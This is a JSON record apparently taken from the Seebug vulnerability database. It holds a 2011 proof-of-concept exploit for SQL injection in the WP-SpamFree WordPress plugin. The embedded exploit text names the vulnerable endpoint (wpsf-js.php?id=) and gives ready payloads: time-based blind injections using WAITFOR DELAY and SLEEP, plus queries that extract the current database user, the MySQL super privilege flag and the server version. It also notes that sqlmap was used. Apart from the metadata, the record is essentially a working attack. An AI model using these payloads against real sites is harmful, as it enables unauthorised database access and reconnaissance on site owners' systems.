{"href": "https://www.seebug.org/vuldb/ssvid-72219", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72219", "cvelist": [], "description": "No description provided by source.", "viewCount": 8, "published": "2014-07-01T00:00:00", "sourceData": "\n #Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]\r\n#Date: 2011-09-25\r\n#Author: [cheki]\r\n#Version:[3.2.1]\r\n#Tested on:[linux]\r\n#Used: ["sqlmap"]\r\n#SQL Injection\r\nhttp://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1\r\n\r\n#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)\r\n\r\n#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()\r\n\r\n#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM\r\nmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)\r\n\r\n#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)\r\n\r\n#Home page: http://hacking.ge/\n ", "id": "SSV:72219", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T13:43:34", "reporter": "Root", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T13:43:34", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T13:43:34", "rev": 2}, "vulnersScore": 0.2}, "references": []}

{}